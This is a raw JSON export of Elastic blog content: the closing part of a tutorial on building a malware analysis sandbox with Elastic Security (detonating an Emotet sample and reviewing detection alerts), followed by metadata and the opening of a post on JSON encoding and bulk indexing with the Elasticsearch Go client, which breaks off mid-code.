auto;\"\u003e\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd9ba908c5cb9848c/601943ddf4a7946af0335884/malware-analysis-sandbox-detection-engine-load-prebuilt-rules.jpg\" data-sys-asset-uid=\"bltd9ba908c5cb9848c\" alt=\"Detection engine load prebuilt rules and timelines\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003cp\u003eAfter the rules have been loaded, you will need to enable any rules that you want turned on. You can go through the rules and select only the rules you want to enable, or you can just turn them all on if you want. Turning all of the rules on is the easiest way to go — it doesn’t hurt anything to have rules enabled, even if there isn’t any data for that particular rule.\n\u003c/p\u003e\u003ch2\u003eCollect network traffic (optional)\u003c/h2\u003e\u003cp\u003eIn addition to capturing the malware’s activity on a host, you may also want to collect its network activity from an external host. Some advantages to doing this are the ability to see the data inside the network events (not simply that they happened). There are several ways to do this, but I prefer to use a separate VM that sniffs the network traffic in the same virtual network.\n\u003c/p\u003e\u003cp\u003eTo do this, you can either use \u003ca href=\"https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-overview.html\"\u003ePacketbeat\u003c/a\u003e, which will give you a good summary of data without flooding your stack with events, or \u003ca href=\"https://www.elastic.co/blog/analyzing-network-packets-with-wireshark-elasticsearch-and-kibana\"\u003eTShark and Filebeat to stream a full packet capture to Elasticsearch\u003c/a\u003e. Within your Packetbeat config, you will want to configure it to collect request and response for most protocols, and to collect the raw certificates for all TLS traffic. It is very common for malware to reuse TLS certificates and they can be a treasure trove of malicious domain names.\n\u003c/p\u003e\u003cp\u003eYour malware analysis sandbox is now complete and ready for testing. Remember to snapshot your VMs in a clean state before you start executing malware.\n\u003c/p\u003e\u003ch2\u003eAnalyzing malware\u003c/h2\u003e\u003ctable style=\"background: #FFFFD2;\"\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\t\u003ctd\u003e\n\t\t\u003cstrong\u003eNote:\u003c/strong\u003e Be careful to never open live malware onto your host system. We recommend keeping the suspected malware in a password-protected zip file to prevent accidental opening. If possible, download the malware directly to the sandbox system.\n\t\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\u003cp\u003eFor this test, I detonated a piece of the \u003ca href=\"https://www.virustotal.com/gui/file/0296ec14c8a455c5010f86e6c51af57b1b0f1caa9c6c720a4a5e16d8699cec86/details\"\u003eEmotet Malware\u003c/a\u003e family. This particular piece of malware is a malicious Office document that requires the user to enable macros to gain execution. If you didn’t disable malware protections in the Endpoint Policy, the malware will be immediately quarantined by Elastic Security, making your test very short.\n\u003c/p\u003e\u003cp\u003eAfter detonating the Emotet Malware in your VM, you can go back to the Elastic Security in Kibana and watch the fireworks. In the Detections tab you will probably see a bunch of new alerts from the malware activity on the host. You can see from the screenshot below that there were multiple initial malware detection alerts. If endpoint security was set to prevent instead of detect, the malware would have been stopped and quarantined at this point and you wouldn’t have all of the extra data.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt319d04c9bdf350f1/601944854b8030688c37a99e/malware-analysis-sandbox-detection-alerts.jpg\" data-sys-asset-uid=\"blt319d04c9bdf350f1\" alt=\"Detection alerts created by Emotet malware\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003cp\u003eNext to one of the alerts you can select the \u003cstrong\u003eAnalyze Event\u003c/strong\u003e icon to open up the Analyzer view to visualize what happened in a tree graph.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt480924a2cbd133f7/601944e83e70bb4c12c6ef5c/malware-analysis-sandbox-analyze-event.jpg\" data-sys-asset-uid=\"blt480924a2cbd133f7\" alt=\"Analyze event icon\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003cp\u003eIn this example I decided to select the strange-looking PowerShell command to see how it fits into the execution chain. The Analyzer view is an interactive view of the execution of the software in a hierarchy view based on the parent process. The lines connecting the processes show the time difference between the start time of the parent process and the child process. If you zoom in on a node, you can see the number of events associated with that process.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdd6fdf1f3c3f9a63/6019450c5f9b2812764c0fc2/malware-analysis-sandbox-analyzer-view-emotet.jpg\" data-sys-asset-uid=\"bltdd6fdf1f3c3f9a63\" alt=\"analyzer view of emotet malware execution\" style=\"display: block; margin: auto;\"\u003e\n\u003c/p\u003e\u003cp\u003eTo find out what actions the PowerShell process took, I can select the node and see that there are 27 separate events associated with this one process. I can then select each of the categories to see what files were created, network connections made, registry entries that were modified, and what libraries were loaded into memory by this process.\n\u003c/p\u003e\u003cp\u003eSome malware will only load certain capabilities after a reboot so it is a good idea to reboot the VM and look for more alerts to see if there are any additional detections.\n\u003c/p\u003e\u003cp\u003eSince all of this information is already in Elastic, I can also view and visualize these events in any of the other Kibana apps, such as within Dashboard or Discover. If you are using Packetbeat to collect network traffic, Kibana comes with many built-in dashboards and visualizations for various network protocols.\n\u003c/p\u003e\u003ch2\u003eConclusion\u003c/h2\u003e\u003cp\u003eIn this post, we covered how to quickly set up your own malware analysis sandbox using Elastic. Within minutes, you can build a sandbox that lets you safely open and observe files while streaming all of the events to your Elastic Stack for safe offline analysis. Within the Elastic InfoSec team we use the information from these files to build new detection rules and hunt for any previously undiscovered attacks to the network.\n\u003c/p\u003e\u003cp\u003eReady to get started? Start your \u003ca href=\"https://cloud.elastic.co/registration?elektra=en-security-page\"\u003efree 14-day trial\u003c/a\u003e (no credit card required). Or \u003ca href=\"https://www.elastic.co/downloads/\"\u003edownload our products\u003c/a\u003e, free, for your on-prem deployment.\n\u003c/p\u003e","category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2021-02-02T12:13:13.640Z","created_by":"blted0d6b193259da16","date_localized":null,"disclaimer":[],"full_bleed_image":{"uid":"blt3fa5153d5b538ccc","ACL":{},"_version":1,"content_type":"image/png","created_at":"2021-01-12T16:57:10.216Z","created_by":"bltf6ab93733e4e3a73","file_size":"100279","filename":"blog-banner-security-endpoint.png","is_dir":false,"parent_uid":null,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-01-12T16:56:55.557Z","user":"bltf6ab93733e4e3a73"},"tags":[],"title":"blog-banner-security-endpoint.png","updated_at":"2021-01-12T16:57:10.216Z","updated_by":"bltf6ab93733e4e3a73","url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3fa5153d5b538ccc/5ffdd4e65b28c33f6281ce98/blog-banner-security-endpoint.png"},"industry":[],"level":[],"markdown_l10n":"","newsfeed":["bltb6dafbbb7b137b04"],"popular_topics":["tutorial"],"product":["packetbeat","elastic endpoint","siem"],"publish_date":"2021-02-03T19:00:00.000Z","rtp_general_l10n":"","rtp_homepage_l10n":"","seo":{"seo_title_l10n":"How to build a malware analysis sandbox with Elastic Security","seo_description_l10n":"Ever wonder if a file is safe to open? In this blog post, we will show you how the Elastic Infosec team uses the Elastic Stack with Elastic Endpoint Security to build a fully instrumented malware analysis sandbox. In addition to being free and easy to build you get Elastic's world class malware detection and process visualization.","canonical_tag":"","twitter":{"creator":"@acjewitt"},"og_markup":{"facebook_profile_id":""},"social":{"paragraph_l10n":"Ever wonder if a file is safe to open? In this blog post, we will show you how the Elastic Infosec team uses the Elastic Stack with Elastic Endpoint Security to build a fully instrumented malware analysis sandbox to look at suspicious files. In addition to being free and easy to build you get Elastic's world class malware detection and process visualization."},"noindex":false},"services_events":[],"tags":[],"tags_blog_type":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbf6fd364f32f8563","ACL":{},"created_at":"2023-11-06T21:50:46.524Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"fleet-elastic-agent","label_l10n":"Fleet/Elastic Agent","tags":[],"title":"Fleet/Elastic Agent","updated_at":"2023-11-06T21:50:46.524Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:48:26.489Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltb5a7ebf330c5002e","ACL":{},"created_at":"2020-06-17T03:36:14.548Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"beats","label_l10n":"Beats","tags":[],"title":"Beats","updated_at":"2020-06-17T03:36:14.548Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:34.244Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt8b37b4b3ec0fe838","ACL":{},"created_at":"2020-06-17T03:36:06.107Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2020-06-17T03:36:06.107Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.315Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt6f3b5313b04c2729","ACL":{},"created_at":"2023-11-06T21:49:22.691Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"customer-story","label_l10n":"Customer story","tags":[],"title":"Customer story","updated_at":"2023-11-06T21:49:22.691Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.115Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_observability_labs":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt2d51fc8cada40465","ACL":{},"created_at":"2023-11-06T20:35:57.040Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-security","label_l10n":"Cloud security","tags":[],"title":"Cloud security","updated_at":"2023-11-06T20:35:57.040Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.295Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltd11e6308b4dbe770","ACL":{},"created_at":"2023-11-06T21:32:01.057Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-research","label_l10n":"Security research","tags":[],"title":"Security research","updated_at":"2023-11-06T21:32:01.057Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.638Z","user":"blt4b2e1169881270a8"}},{"title":"Threat hunting","label_l10n":"Threat hunting","keyword":"threat-hunting","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltba572dcfa2880a69","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:33:57.466Z","updated_at":"2023-11-06T21:33:57.466Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:31.696Z","user":"blt4b2e1169881270a8"}},{"title":"Investigation \u0026 incident response","label_l10n":"Investigation \u0026 incident response","keyword":"investigation-incident-response","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt43660d1624e728b9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:40:59.781Z","updated_at":"2023-11-06T20:41:24.521Z","ACL":{},"_version":2,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:37.865Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt43ad419de732b584","ACL":{},"created_at":"2023-11-06T21:31:46.367Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-analytics","label_l10n":"Security analytics","tags":[],"title":"Security analytics","updated_at":"2023-11-06T21:31:46.367Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.534Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt94fd9c3bf14d1f7c","ACL":{},"created_at":"2023-11-06T21:35:54.155Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"vulnerability-management","label_l10n":"Vulnerability Management (VM)","tags":[],"title":"Vulnerability Management (VM)","updated_at":"2023-11-06T21:35:54.155Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.168Z","user":"blt4b2e1169881270a8"}},{"title":"Automated threat protection","label_l10n":"Automated threat protection","keyword":"automated-threat-protection","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt49e356fcb7971aca","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:22.822Z","updated_at":"2023-11-06T20:08:22.822Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:37.794Z","user":"blt4b2e1169881270a8"}},{"title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"_version":1,"is_dir":false,"uid":"blt352501c0f8a2dc74","ACL":{},"content_type":"image/png","created_at":"2021-01-12T16:56:49.441Z","created_by":"bltf6ab93733e4e3a73","file_size":"76088","filename":"blog-thumb-security-endpoint.png","parent_uid":"blta8bbe6455dcfdb35","tags":[],"title":"blog-thumb-security-endpoint.png","updated_at":"2022-02-11T21:04:06.001Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-24T17:27:09.891Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt352501c0f8a2dc74/5ffdd4d1fc835846353c414b/blog-thumb-security-endpoint.png"},"title":"How to build a malware analysis sandbox with Elastic Security","title_l10n":"How to build a malware analysis sandbox with Elastic Security","updated_at":"2024-05-22T19:49:31.933Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/how-to-build-a-malware-analysis-sandbox-with-elastic-security","use_case":["security analytics"],"versions":[],"weekly_category":[],"publish_details":{"time":"2024-05-22T19:49:38.481Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt4856c689f91e4691","_version":9,"locale":"en-us","ACL":{},"abstract_l10n":"In our series on the Go client for Elasticsearch, we've covered the architecture and design of the client and how to configure it. In this post, we’ll look at encoding and decoding JSON payloads and efficiently indexing documents in bulk.","author":["blt4ae86dcbc65b02f1"],"body_l10n":"","category":[{"uid":"bltb79594af7c5b4199","_version":3,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:05.640Z","created_by":"blt3044324473ef223b70bc674c","key":"product","label_l10n":"Product","tags":[],"title":"Product","updated_at":"2024-05-10T13:44:20.209Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.527Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2020-09-16T19:08:47.445Z","created_by":"bltda02bad9f9f792f1","date_localized":null,"disclaimer":[],"full_bleed_image":{"_version":2,"is_dir":false,"uid":"blt5d0e32fd192657ef","ACL":{},"content_type":"image/jpeg","created_at":"2020-04-22T21:09:55.931Z","created_by":"bltea6cbb86fea188be","description":"","file_size":"184976","filename":"blog-banner-board-game-go.jpg","parent_uid":null,"tags":[],"title":"blog-banner-board-game-go.jpg","updated_at":"2020-11-25T17:54:45.529Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-11-25T17:55:04.606Z","user":"bltf6ab93733e4e3a73"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5d0e32fd192657ef/5fbe9a65c1502b76a169f9a4/blog-banner-board-game-go.jpg"},"industry":[],"level":["introduction"],"markdown_l10n":"In our previous two blogs, we provided an [overview of the architecture and design of the Elasticsearch Go client](https://www.elastic.co/blog/the-go-client-for-elasticsearch-introduction) and explored [how to configure and customize the client](https://www.elastic.co/blog/the-go-client-for-elasticsearch-configuration-and-customization). In doing so, we pointed to a number of [examples available in the GitHub repository](https://github.com/elastic/go-elasticsearch/tree/master/_examples). The goal of these examples is to provide executable \"scripts\" for common operations, so it's a good idea to look there whenever you're trying to solve a specific problem with the client.\n\nIn this post, we’ll look at different ways of encoding and decoding JSON payloads, as well as using the `esutil.BulkIndexer` helper.\n## Encoding and decoding JSON payloads\n\nOne of the topics we have touched only briefly is working with the JSON payloads. The client, as mentioned in a [previous blog](https://www.elastic.co/blog/the-go-client-for-elasticsearch-introduction), exposes the request and response body as an `io.Reader`, leaving any encoding and decoding to the calling code. Let's have a look at various approaches, starting with decoding (deserializing) the response body.\n\nThe easiest option is to simply use the [`encoding/json`](https://pkg.go.dev/encoding/json?tab=doc) package from the standard library to decode the response into a `map[string]interface{}` or a custom a `struct` type; the [main example](https://github.com/elastic/go-elasticsearch/blob/master/_examples/main.go) provides a demonstration:\n\n```\nvar r map[string]interface{}\n\nres, _ := es.Search(es.Search.WithTrackTotalHits(true))\njson.NewDecoder(res.Body).Decode(\u0026r)\n\nfmt.Printf(\n \"[%s] %d hits; took: %dms\\n\",\n res.Status(),\n int(r[\"hits\"].(map[string]interface{})[\"total\"].(map[string]interface{})[\"value\"].(float64)),\n int(r[\"took\"].(float64)),\n)\n\n// =\u003e [200 OK] 1 hits; took: 10ms\n```\n\nWhile easy, this option is far from the most convenient or effective: notice how you have to type-cast each part of the structure in order to make the value useful in your code. There are better ways.\n\nIf all you're interested in is getting a couple of values from the response and using or displaying them, an attractive option is to use the [`tidwall/gjson`](https://github.com/elastic/go-elasticsearch/tree/master/_examples/encoding#tidwallgjson) package. It allows you to use the \"dot notation\" — familiar from the [`jq`](https://stedolan.github.io/jq/) command line utility — to \"pluck\" the values from the response easily, as well as more efficiently:\n\n```\nvar b bytes.Buffer\n\nres, _ := es.Search(es.Search.WithTrackTotalHits(true))\nb.ReadFrom(res.Body)\n\nvalues := gjson.GetManyBytes(b.Bytes(), \"hits.total.value\", \"took\")\nfmt.Printf(\n \"[%s] %d hits; took: %dms\\n\",\n res.Status(),\n values[0].Int(),\n values[1].Int(),\n)\n// =\u003e [200 OK] 1 hits; took: 10ms\n```\n\nYet another option, especially for more complex codebase, is to use a package such as [`mailru/easyjson`](https://github.com/elastic/go-elasticsearch/tree/master/_examples/encoding#mailrueasyjson), which uses code generation to efficiently encode and decode the JSON payload into custom `struct` types — please refer to the [corresponding example](https://github.com/elastic/go-elasticsearch/blob/master/_examples/encoding/easyjson.go) and the [associated model](https://github.com/elastic/go-elasticsearch/tree/master/_examples/encoding/model) folder.\n\n_Note: Run the [benchmarks](https://github.com/elastic/go-elasticsearch/tree/master/_examples/encoding#benchmarks) in your own environment to compare the performance of different JSON packages._\n\nWhen it comes to encoding (serializing) the request body, the easiest option is to use a type which supports the `io.Reader` interface, such as `bytes.Buffer`. Again, the [main example](https://github.com/elastic/go-elasticsearch/blob/master/_examples/main.go) provides a demonstration:\n\n```\nvar b bytes.Buffer\nb.WriteString(`{\"title\" : \"`)\nb.WriteString(\"Test\")\nb.WriteString(`\"}`)\n\nres, _ := es.Index(\"test\", \u0026b)\nfmt.Println(res)\n// =\u003e [201 Created] {\"_index\":\"test\",\"_id\":\"uFeRWXQBeb...\n```\n\nSince encoding structs or `map[string]interface{}` values is so frequent, the `esutil` package provides the [helper](https://github.com/elastic/go-elasticsearch/tree/master/_examples/encoding#esutiljsonreader) which performs the serialization and conversion into `io.Reader`, so the equivalent of the code above would look like this:\n\n```\ntype MyDocument struct {\n Title string `json:\"title\"`\n}\n\ndoc := MyDocument{Title: \"Test\"}\n\nres, _ := es.Index(\"test\", esutil.NewJSONReader(\u0026doc))\nfmt.Println(res)\n// [201 Created] {\"_index\":\"test\",\"_id\":\"wleUWXQBe...\n```\n\n_Note: The helper plays well with custom JSON encoders. If the type implements the [`esutil.JSONEncoder`](https://pkg.go.dev/github.com/elastic/go-elasticsearch/v7@v7.8.0/esutil?tab=doc#JSONEncoder) interface, the `EncodeJSON()` method is automatically used; otherwise, it falls back to the standard library._\n\nIn order to understand how to use the client in a common application, invest some time into getting familiar with the comprehensive [`xkcdsearch`](https://github.com/elastic/go-elasticsearch/tree/master/_examples/xkcdsearch) example. It indexes information from the JSON API and allows you to search it on the command line and in the browser. It demonstrates a handful of techniques, such as embedding the client in your own type, building queries, parsing the responses, highlighting the matching phrases in results, mocking the client for tests, and many more. You can preview the application [online](https://xkcd-golang.app.elstc.co/?q=python).\n\n\n\n## Bulk indexing\n\nOne of the most common use cases for any Elasticsearch client is indexing documents into Elasticsearch as quickly and efficiently as possible. The most straightforward option, using the plain [Elasticsearch Bulk API](https://www.elastic.co/guide/en/elasticsearch/reference/7.x/docs-bulk.html), comes with a lot of drawbacks: you have to manually prepare the meta and data pairs of the payload, divide the payload into batches, deserialize the response, inspect the results for errors, display a report, and so on. The [default example](https://github.com/elastic/go-elasticsearch/blob/master/_examples/bulk/default.go) in the repository demonstrates quite eloquently how involved it all is.\n\nFor that reason, the client provides a helper component, [`esutil.BulkIndexer`](https://pkg.go.dev/github.com/elastic/go-elasticsearch/v7@v7.8.0/esutil?tab=doc#BulkIndexer), similar to bulk helpers in [other clients](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-bulk.html#bulk-clients):\n\n```\n$ go doc -short github.com/elastic/go-elasticsearch/v7/esutil.BulkIndexer\ntype BulkIndexer interface {\n // Add adds an item to the indexer.\n // ...\n Add(context.Context, BulkIndexerItem) error\n\n // Close waits until all added items are flushed and closes the indexer.\n Close(context.Context) error\n\n // Stats returns indexer statistics.\n Stats() BulkIndexerStats\n}\n```\n\nAs you can see, the interface is rather minimal, and allows for adding individual items to the indexer, closing the indexing operations when there are no more items to add, and getting statistics about the operations. The component will take care of serializing the items and preparing the payload, sending it in batches, and parallelizing the operations, in a concurrent-safe fashion.\n\nThe indexer is configured through the [`esutil.BulkIndexerConfig`](https://pkg.go.dev/github.com/elastic/go-elasticsearch/v7@v7.8.0/esutil?tab=doc#BulkIndexerConfig) struct passed as an argument to the constructor:\n\n```\n$ go doc -short github.com/elastic/go-elasticsearch/v7/esutil.BulkIndexerConfig\ntype BulkIndexerConfig struct {\n NumWorkers int // The number of workers. Defaults to runtime.NumCPU().\n FlushBytes int // The flush threshold in bytes. Defaults to 5MB.\n FlushInterval time.Duration // The flush threshold as duration. Defaults to 30sec.\n\n Client *elasticsearch.Client // The Elasticsearch client.\n Decoder BulkResponseJSONDecoder // A custom JSON decoder.\n DebugLogger BulkIndexerDebugLogger // An optional logger for debugging.\n\n OnError func(context.Context, error) // Called for indexer errors.\n OnFlushStart func(context.Context) context.Context // Called when the flush starts.\n OnFlushEnd func(context.Context) // Called when the flush ends.\n\n // Parameters of the Bulk API.\n Index string\n // ...\n}\n```\n\nThe `NumWorkers` field controls the level of parallelization, i.e., it sets the number of workers performing the flush operations. The `FlushBytes` and `FlushInterval` fields set the thresholds for the flush operation, based either on the payload content or the time interval. It is important to experiment with different values for these values, tailored to your data and environment.\n\nThe repository contains an [executable script](https://github.com/elastic/go-elasticsearch/tree/master/_examples/bulk/benchmarks) which allows you to easily experiment with different settings for these parameters. It is crucial to run it in a topology mirroring your production environment, following the [best practices](https://www.elastic.co/blog/seven-tips-for-better-elasticsearch-benchmarks) for benchmarking Elasticsearch. For example, on a common notebook, running against a local cluster, the indexer throughput is about 10,000 small documents per second. When the indexer runs on a dedicated machine, against a remote cluster, on a realistic hardware, the throughput nears 300,000 documents per second.\n\nThe `Client` field allows you to pass an instance of `elasticsearch.Client`, with any desired configuration for logging, security, retries, custom transport, and so on.\n\nFollowing the common theme of extensibility, the `Decoder` field accepts a type implementing the `esutil.BulkResponseJSONDecoder` interface, making it possible to use a more efficient JSON encoder than the standard library's `encoding/json`.\n\nThe documents to be indexed are added as [`esutil.BulkIndexerItem`](https://pkg.go.dev/github.com/elastic/go-elasticsearch/v7@v7.8.0/esutil?tab=doc#BulkIndexerItem) to the indexer:\n\n```\ngo doc -short github.com/elastic/go-elasticsearch/v7/esutil.BulkIndexerItem\ntype BulkIndexerItem struct {\n Index string\n Action string\n DocumentID string\n Body io.Reader\n RetryOnConflict *int\n\n OnSuccess func(context.Context, BulkIndexerItem, BulkIndexerResponseItem) // Per item\n OnFailure func(context.Context, BulkIndexerItem, BulkIndexerResponseItem, error) // Per item\n}\n```\n\nLet's put all these pieces of information together by walking through the code of the repository [example](https://github.com/elastic/go-elasticsearch/tree/master/_examples/bulk#indexergo). Clone the repository and run `cd _examples/bulk \u0026\u0026 go run indexer.go` to execute it locally.\n\nThe example indexes a data structure defined by the `Article` and `Author` types:\n\n```\ntype Article struct {\n ID int `json:\"id\"`\n Title string `json:\"title\"`\n Body string `json:\"body\"`\n Published time.Time `json:\"published\"`\n Author Author `json:\"author\"`\n}\n\ntype Author struct {\n FirstName string `json:\"first_name\"`\n LastName string `json:\"last_name\"`\n}\n```\n\nFirst, we'll create the Elasticsearch client, using a third-party package, [`cenkalti/backoff/`](https://github.com/cenkalti/backoff/), for exponential backoff implementation.\n\n```\n// Use a third-party package for implementing the backoff function\n//\nretryBackoff := backoff.NewExponentialBackOff()\n\nes, err := elasticsearch.NewClient(elasticsearch.Config{\n// Retry on 429 TooManyRequests statuses\n//\nRetryOnStatus: []int{502, 503, 504, 429},\n\n// Configure the backoff function\n//\nRetryBackoff: func(i int) time.Duration {\n if i == 1 {\n retryBackoff.Reset()\n }\n return retryBackoff.NextBackOff()\n},\n\n// Retry up to 5 attempts\n//\nMaxRetries: 5,\n})\n```\n\nNext, we'll create the bulk indexer:\n\n```\n// Create the BulkIndexer\n//\nbi, err := esutil.NewBulkIndexer(esutil.BulkIndexerConfig{\n Index: indexName, // The default index name\n Client: es, // The Elasticsearch client\n NumWorkers: numWorkers, // The number of worker goroutines\n FlushBytes: int(flushBytes), // The flush threshold in bytes\n FlushInterval: 30 * time.Second, // The periodic flush interval\n})\n```\n\nLet's create the data for indexing:\n\n```\nvar articles []*Article\nnames := []string{\"Alice\", \"John\", \"Mary\"}\nfor i := 1; i \u003c= numItems; i++ {\n articles = append(articles, \u0026Article{\n ID: i,\n Title: strings.Join([]string{\"Title\", strconv.Itoa(i)}, \" \"),\n Body: \"Lorem ipsum dolor sit amet...\",\n Published: time.Now().Round(time.Second).UTC().AddDate(0, 0, i),\n Author: Author{\n FirstName: names[rand.Intn(len(names))],\n LastName: \"Smith\",\n },\n })\n}\n```\n\n_Note: The `indexName`, `numWorkers`, `flushBytes` and `numItems` variables are set with the command line flags; see `go run indexer.go --help`._\n\nWe can loop over the `articles` collection now, adding each item to the indexer:\n\n```\nvar countSuccessful uint64\nstart := time.Now().UTC()\n\nfor _, a := range articles {\n // Prepare the data payload: encode article to JSON\n //\n data, err := json.Marshal(a)\n if err != nil 